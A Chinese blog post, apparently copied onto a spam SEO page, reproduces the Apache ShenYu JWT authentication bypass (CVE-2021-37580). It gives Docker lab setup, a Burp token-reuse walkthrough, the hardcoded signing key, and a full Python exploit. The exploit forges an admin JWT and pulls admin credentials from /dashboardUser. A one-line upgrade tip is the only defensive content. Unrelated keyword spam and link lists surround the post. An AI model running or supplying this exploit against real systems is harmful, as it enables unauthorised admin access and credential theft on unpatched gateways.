当前位置: 首页 > news >正文

推广广告赚钱软件青岛神马排名优化

推广广告赚钱软件,青岛神马排名优化,武汉网站建设费用,天津项目网站建设Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现) 漏洞名称 漏洞描述 Apache ShenYu是一个异步的,高性能的&#x…

Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现

  • 漏洞名称
    • 漏洞描述
    • 影响版本
  • 漏洞复现
    • 环境搭建
    • 漏洞利用
  • 修复建议
  • 总结

Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现)

漏洞名称

漏洞描述

Apache ShenYu是一个异步的,高性能的,跨语言的,响应式的API网关,Apache ShenYu功能十分强大且易于扩展,支持各种语言的http协议,同时支持Dubbo、 Spring Cloud、 gRPC、 Motan、 Sofa、 Tars 等协议。2021年11月,Apache ShenYu被爆出存在身份认证绕过漏洞,攻击者可以通过该漏洞绕过JWT(JSON Web Token)安全认证机制,直接进入系统后台。

影响版本

Apache ShenYu 2.3.0
Apache ShenYu 2.4.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:9095
攻击者IP:192.168.63.1

docker直接拉取环境

docker pull apache/shenyu-admin:2.4.0
docker network create shenyu
docker run -d -p 9095:9095 --net shenyu apache/shenyu-admin:2.4.0

环境启动后,访问http://192.168.63.129:9095即可看到一个shenyu页面,说明已成功启动,使用admin/123456登录系统。

在这里插入图片描述

漏洞利用

创建一个wahaha/wahaha,权限为default,使用刚创建的用户登录系统。

在这里插入图片描述

显示登录用户的角色未配置菜单权限

在这里插入图片描述

使用burp抓包,在响应体中返回了token。

在这里插入图片描述

更改请求路径为/dashboardUser,并在请求头加入X-Access-Token字段,成功返回admin的账户和密码。

X-Access-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6IndhaGFoYSIsImV4cCI6MTcwMzE0MTE1Nn0.Y0U14VyZ0aQ32Y-YX9tz7LF3qCD_R5GPxP563BOUDEs

在这里插入图片描述

如果没有获取到普通用户的token,可以使用脚本生成admin的token,成功获取信息。

pip install PyJWT
python cve-2021-37580.py http://192.168.63.129:9095
import time
from jwt import PyJWTif __name__ == "__main__":headers = {"alg": "HS256","typ": "JWT"}salt = "2095132720951327"exp = int(time.time())payload = {"userName": 'admin',"exp": exp}token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)print(token)

sss
在这里插入图片描述

完整的EXP:

import requests
import re
import time
from jwt import PyJWTdef generateToken():headers = {"alg": "HS256","typ": "JWT"}salt = "2095132720951327"exp = int(time.time())payload = {"userName": 'admin',"exp": exp}token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)return tokenif __name__ == "__main__":import systry:url=sys.argv[1]except:print("Usage: %s http://www.baidu.com")exit(0)if isinstance(url,str):url1 = url + '/dashboardUser'headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0','X-Access-Token': generateToken()}try:response = requests.get(url1, headers=headers, verify=False, timeout=3).json()print(response)except:print("没有该漏洞")

修复建议

1、升级至最新版本

https://shenyu.apache.org/download/

总结

payload的意思是使用了一个JWT令牌(X-Access-Token),对其进行Base64解码可得到攻击者尝试的用户为 "userName": "admin"。由于服务端在使用JWT的时候,也没有校验key,导致任意能解码的JWT,并且只要用户(userName的值)存在,都能通过校验。如果攻击成功,在响应头中返回的状态码为200,且在响应体中返回"query success"、"userName":""、"passwprd":""字样。

http://www.fp688.cn/news/158162.html

相关文章:

  • 哪个分销平台比较好免费智能seo收录工具
  • 做自行车车队网站的名字百度排名
  • 重庆市住房城乡建设网站竞价推广账户竞价托管收费
  • 都达科技股份有限公司网页设计合肥百度关键词优化
  • 汽车之家 网站建设市场营销方案怎么做
  • 金华市住房建设局网站想做app推广项目在哪找
  • 做排行榜的网站知乎哈尔滨关键词排名工具
  • 青岛做网站公司电话网页设计用什么软件
  • 品牌工厂网站建设站长统计app下载大全
  • 做儿童成长相册模版网站推广方案怎么做
  • 北京高端网站设计公司西安seo代理计费
  • 小程序定制和第三方开发有什么区别长春网站优化哪家好
  • 结合公众号小店做网站友情链接网址
  • 电子商务网站的类型网络营销专业技能
  • 做程序任务发布的网站关键词seo排名怎么样
  • 网站开发专利申请市场调研报告范文2000
  • 手机制作最简单钓鱼网站常熟seo关键词优化公司
  • 婚恋网站建设成本刚刚中国宣布重大消息
  • 豪华网站设计国内重大新闻10条
  • python数据分析做网站百度广告投诉电话
  • 非法网站开发者刑事责任百度一下你就知道官网首页
  • 网站无搜索结果页面怎么做网站权重是什么意思
  • 珠海网站运营陕西整站关键词自然排名优化
  • 网站关键词如何做优化查网站流量查询工具
  • 漳州市建设局网站6谷歌seo零基础教程
  • 建设网站的具体步骤南京网站制作
  • 武汉做网站公司哪家好网店seo排名优化
  • 专门做网站的seo优化评论
  • 租用网站百度搜索推广是什么
  • 当当网网站建设需求分析我是seo关键词